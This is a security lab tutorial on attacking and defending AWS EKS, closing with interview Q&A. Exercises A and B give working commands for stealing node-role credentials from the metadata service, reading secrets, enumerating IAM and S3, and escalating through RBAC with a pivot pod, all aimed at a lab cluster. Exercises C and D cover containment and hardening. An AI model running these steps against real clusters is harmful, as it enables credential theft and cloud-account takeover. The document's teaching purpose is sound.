Security Notes
Hands-on Labs

Scenario: The Same Heist, One Layer Up — Attacking and Defending EKS

The ir-scenario lab popped an EC2 box and stole its role through the metadata service. EKS changes the shape of that attack without changing the ending. Now the "box" is a pod, the "role" can be assumed three different ways, and there's a whole second authorization system — Kubernetes RBAC — sitting between the attacker and the cloud account. This lab walks all of it: how a pod gets AWS power, how an in-cluster identity escalates to cloud compromise, how you contain a bad pod, and how admission control would have stopped it.

11 min read 7 sections 6 model answers verified 2026-06

Last verified2026-06

Read this once, then run the four exercises with the cluster up.


First: the three ways a pod can hold AWS credentials

This is the single most important EKS security concept and a guaranteed interview question. A container in EKS can end up with AWS permissions through three very different paths — and they have wildly different blast radii.

1. NODE INSTANCE ROLE  (the accident)
     pod ──curl──► 169.254.169.254 (IMDS) ──► node's IAM role creds
     • every pod on the node can reach it unless you block IMDS
     • the pod inherits the NODE's permissions (ECR pull, CNI, SSM…), not its own
     • this is the EC2 attack from ir-scenario, now launched from inside a container

2. IRSA — IAM Roles for Service Accounts  (the intended way, pre-2023)
     pod's ServiceAccount has a signed OIDC token ──► STS AssumeRoleWithWebIdentity
       ──► creds for a role whose TRUST POLICY names that exact ServiceAccount
     • per-workload, least-privilege — IF you scope the trust + permissions tightly
     • the SA annotation eks.amazonaws.com/role-arn is the wiring

3. EKS POD IDENTITY  (the newer way, 2023+)
     an EKS agent + a "Pod Identity Association" maps SA -> role; no OIDC annotation
     • same idea as IRSA, simpler trust model; not used in this lab but name-drop it
Memory hook

One-linerIn EKS a pod gets AWS creds three ways — by accident off the node's IMDS, on purpose via IRSA's OIDC token, or via the newer Pod Identity agent. The accident gives it the node's role; the other two give it its own.

This lab builds path 1 (weakened IMDS) and path 2 (an over-broad IRSA role) so you can run both and compare what each yields.


How IRSA actually works (path 2, in detail)

  pod (webapp-sa)                 EKS OIDC issuer            STS                 IAM
       │  projected JWT signed by the cluster                │                   │
       │  (mounted at /var/run/secrets/eks.amazonaws.com/...)│                   │
       │                                                     │                   │
       │  AssumeRoleWithWebIdentity(roleArn, token)          │                   │
       ├────────────────────────────────────────────────────►│                  │
       │                                                     │ 1. is the OIDC    │
       │                                                     │    issuer a       │
       │                                                     │    registered     │
       │                                                     │    provider?      ├──┐
       │                                                     │ 2. does the role's│  │
       │                                                     │    trust policy   │◄─┘
       │                                                     │    allow this     │
       │                                                     │    sub (the SA)?  │
       │   { ASIA…, Secret, SessionToken, Expiration }       │ 3. yes → mint     │
       │◄────────────────────────────────────────────────────┤    role creds    │
       ▼
   pod now calls AWS as  assumed-role/eks-lab-webapp-overbroad/botocore-session-…

The AWS SDK inside the pod does this automatically — it sees the AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN_FILE env vars the EKS webhook injected (because of the SA annotation) and performs the exchange on the first API call. Just like ir-scenario, no static keys touch disk, and the credential is a temporary ASIA… STS cred.

Tie-back to cloudtrail-detectionthat AssumeRoleWithWebIdentity is a CloudTrail event. So is everything the role then does. The detection lab's "01 - who assumed which role" Athena query surfaces this exact pivot.


Exercise A — IRSA + IMDS theft (attacker view)

Goal: see the legitimate IRSA path, then the illegitimate IMDS path, and compare.

bash
# [laptop]  exec into the webapp pod (this is "attacker has code-exec in the app")
POD=$(kubectl -n apps get pod -l app=webapp -o name)
kubectl -n apps exec -it "$POD" -- sh
sh
# [inside the pod]  PATH 2 — the role this workload was GIVEN via IRSA:
aws sts get-caller-identity
#   → assumed-role/eks-lab-webapp-overbroad/...   (its own IRSA role — an ASIA… cred)

# the over-broad role can read the "production secret" and enumerate the account:
aws ssm get-parameter --name /eks-lab/prod/db-password --with-decryption \
  --query Parameter.Value --output text          # → L4b-Pl@ceholder-NotReal
aws s3 ls                                          # → every bucket in the account
aws iam list-users                                 # → full IAM enumeration

# PATH 1 — now steal the NODE's role straight off IMDS (the ir-scenario attack,
# from inside a container). IMDSv1 is allowed and hop-limit is 2, so a plain GET works:
command -v curl || dnf install -y curl-minimal     # the image may not ship curl
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
echo "node role: $ROLE"
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
#   → AccessKeyId / SecretAccessKey / Token for the NODE's role (eks-lab-node)
exit

Lessonthe pod has two identities available — its scoped IRSA role and, by reaching IMDS, the node's role. The node role here is modest (ECR/CNI/SSM), but on many clusters it's over-granted, and reaching it lets one pod act as the node and therefore touch every other pod's secrets. The fix (Exercise D) is to block pod→IMDS. And note the IRSA role is itself the problem this time: a web app got s3:* + iam:List* — over-broad IRSA = account-wide blast radius, exactly like the EC2 role two labs ago.


Exercise B — In-cluster RBAC privilege escalation

Goal: a Kubernetes identity that "only deploys apps" becomes full cloud compromise — purely through over-permissive RBAC. This is the attack that has no EC2 equivalent.

bash
# [laptop]  Mint a token for the ci-deployer ServiceAccount (simulating a stolen SA
# token / a workload running as ci-deployer) and see what it can do:
TOKEN=$(kubectl -n apps create token ci-deployer)

kubectl --token="$TOKEN" -n apps auth can-i --list | grep -Ei 'secret|pod|exec'
#   → it can get/list secrets, create pods, and create pods/exec. Too much.

# 1) Direct: read the in-cluster secret it should never see
kubectl --token="$TOKEN" -n apps get secret app-secrets -o jsonpath='{.data.db-password}' | base64 -d
#   → in-cluster-secret-not-real

# 2) The bridge to CLOUD: create a pod that runs AS webapp-sa, inheriting its IRSA role.
#    "I can create pods" + "I can pick the ServiceAccount" = I can borrow any role in
#    the cluster. This is the RBAC -> IRSA -> AWS escalation.
cat <<'EOF' | kubectl --token="$TOKEN" -n apps apply -f -
apiVersion: v1
kind: Pod
metadata: { name: pivot, namespace: apps }
spec:
  serviceAccountName: webapp-sa
  containers:
  - name: c
    image: public.ecr.aws/aws-cli/aws-cli:latest
    command: ["sleep","infinity"]
EOF
kubectl -n apps exec pivot -- aws sts get-caller-identity
#   → assumed-role/eks-lab-webapp-overbroad/...  — the deployer is now the cloud role.
kubectl -n apps delete pod pivot

LessonKubernetes RBAC is a second authorization plane in front of your cloud account, and create pods (with free choice of ServiceAccount) or pods/exec are privilege-escalation primitives — they let a low-value identity borrow a high-value one. Treat "can create/modify pods in a namespace that has powerful ServiceAccounts" as equivalent to holding those SAs' permissions.

Detectablethis all lands in the EKS audit log (terraform output control_plane_log_group). aws logs tail <group> --follow while you run the above and you'll see the create pods and create token requests, with the user.


Exercise C — Pod IR / containment

Goal: contain the compromised webapp pod without killing it (you want it alive for forensics), then take the node out of service.

bash
# [laptop]  1) NETWORK ISOLATION — label the pod so the `quarantine` NetworkPolicy
# (deny all ingress+egress) selects it. Requires VPC CNI policy enforcement, which
# the Terraform enabled.
POD=$(kubectl -n apps get pod -l app=webapp -o jsonpath='{.items[0].metadata.name}')
kubectl -n apps label pod "$POD" quarantine=isolate

# prove containment: the pod can no longer reach AWS / the internet, but is still alive
kubectl -n apps exec "$POD" -- sh -c 'aws sts get-caller-identity --cli-connect-timeout 5 || echo CONTAINED'
#   → CONTAINED (network calls time out; you can still exec/log — that's the API server)

# 2) REVOKE THE CLOUD IDENTITY — pull the IRSA role out from under the pod by removing
# the SA annotation (new token exchanges fail; existing creds die at expiry).
kubectl -n apps annotate sa webapp-sa eks.amazonaws.com/role-arn-

# 3) NODE ISOLATION — cordon (no new pods) then drain (evict existing) for forensics:
NODE=$(kubectl get nodes -o jsonpath='{.items[0].metadata.name}')
kubectl cordon "$NODE"
kubectl drain "$NODE" --ignore-daemonsets --delete-emptydir-data --force
# (for disk/memory forensics on the node itself, Session-Manager onto it — the node
#  role has AmazonSSMManagedInstanceCore:  aws ssm start-session --target <instance-id>)

Lessoncontainment in Kubernetes has layers — network (NetworkPolicy), identity (revoke IRSA), and node (cordon/drain), and you reach for them in that order to stop the bleeding while preserving evidence. Mirrors ir-scenario's "isolate the instance" step, but you isolate the pod first because that's the smallest blast radius.


Exercise D — Admission control & hardening

Goal: the controls that would have blocked all of the above. Built-in Pod Security Admission needs no extra components — just namespace labels.

bash
# [laptop]  apply the restricted namespace + two pods (one bad, one good):
kubectl apply -f k8s/40-psa-restricted.yaml

The good-pod is admitted. The bad-pod is rejected at admission (before it's ever scheduled) with a restricted:latest violation listing six problems:

What the API server reportsThe offending field in bad-podProfile level
privileged must not be trueprivileged: truebaseline (the strongest)
allowPrivilegeEscalation != falseallowPrivilegeEscalation: truerestricted
runAsUser=0 not allowedrunAsUser: 0restricted
runAsNonRoot != true(never set)restricted
unrestricted capabilitiesno capabilities.drop: ["ALL"]restricted
seccompProfile not setno seccompProfile.typerestricted

The first (privileged) alone is enough to reject it; the other five are the tighten-ups restricted layers on top of baseline. The good-pod flips exactly those fields, so it's admitted. Label your real namespaces the same way:

bash
kubectl label ns apps pod-security.kubernetes.io/warn=restricted    # warn first
# then, once workloads comply:
kubectl label ns apps pod-security.kubernetes.io/enforce=restricted --overwrite

The other two hardening moves, tied to Exercises A and C:

bash
# Fix path-1 IMDS theft: stop pods reaching the node's metadata service.
# In eks-nodes.tf set http_tokens="required" and http_put_response_hop_limit=1, then:
terraform apply       # new launch-template version; recycle the node group to take effect

# Default-deny egress so a popped pod can't phone home or hit IMDS in the first place:
kubectl apply -f k8s/35-default-deny-egress.yaml   # all-pods deny-egress, DNS allowed (breaks AWS calls on purpose)

LessonPod Security Admission (free, built-in) blocks the privileged/root pods that make node escape easy; IMDSv2 + hop-limit-1 closes path 1; default-deny egress closes exfiltration. Kyverno or OPA/Gatekeeper are the step-up when you need policies PSS can't express (e.g. "only images from our registry") — but start with PSS.


Interview Q&A

Q
A pod in EKS is making AWS API calls. What are the possible ways it got those credentials, and which is the dangerous one?
Model answer

Three ways — it reached the node's metadata service and inherited the node instance role, it used IRSA (its ServiceAccount's OIDC token traded at STS for a scoped role), or the newer EKS Pod Identity agent. The dangerous one is the node role via IMDS, because every pod on the node can reach it unless you block it, and it gives the pod the node's permissions rather than its own — so you lose per-workload least privilege. The fix is IMDSv2 with hop-limit 1 plus a scoped IRSA role per workload.

Q
What actually makes IRSA work under the hood?
Model answer

The cluster has an OIDC issuer registered as an IAM identity provider. A pod's ServiceAccount gets a short-lived signed JWT projected into it; the AWS SDK calls STS AssumeRoleWithWebIdentity with that token, and STS hands back temporary role credentials — but only if the role's trust policy names that exact ServiceAccount in its sub condition. So the trust is anchored in the cluster's OIDC signature, and the scoping lives in the role trust policy, which is why a wildcard sub there is so dangerous.

Q
How does over-permissive Kubernetes RBAC turn into a cloud-account compromise?
Model answer

RBAC verbs like create pods or pods/exec are privilege- escalation primitives — if I can create a pod and choose its ServiceAccount, I can launch a pod as a powerful IRSA ServiceAccount and inherit its IAM role, and if I can exec into an existing pod I can use whatever credentials it holds. So a "just deploys apps" identity becomes whatever the most powerful ServiceAccount in that namespace can do in AWS. The lesson is to treat pod-create/exec in a namespace with privileged ServiceAccounts as equivalent to holding those roles.

Q
You suspect one pod is compromised. How do you contain it without destroying evidence?
Model answer

Isolate in layers, smallest blast radius first: apply a deny-all NetworkPolicy by labelling the pod so it can't reach AWS or move laterally, but leave it running so you keep memory and process state; revoke its cloud identity by stripping the IRSA annotation so new credential exchanges fail; then cordon and drain the node and acquire it via Session Manager for disk/memory forensics. You avoid kubectl delete, which would throw away the evidence.

Q
NetworkPolicy on EKS — what's the gotcha?
Model answer

On a stock EKS cluster the VPC CNI accepts NetworkPolicy objects but doesn't enforce them — your "default-deny" silently does nothing. You have to enable enforcement in the VPC CNI addon (enableNetworkPolicy=true, CNI 1.14+) or run Calico. It's a classic false sense of security: the policy is "applied" and shows in kubectl get netpol, but traffic still flows until enforcement is on.

Q
What's the cheapest, fastest hardening you can apply to a new cluster's namespaces?
Model answer

Built-in Pod Security Admission — just label the namespace pod-security.kubernetes.io/enforce: restricted and the API server rejects privileged, root, or capability-laden pods at admission, no extra components. Roll it out as warn first to find violators, then flip to enforce. Reach for Kyverno or OPA/Gatekeeper only when you need rules PSS can't express, like restricting images to an approved registry.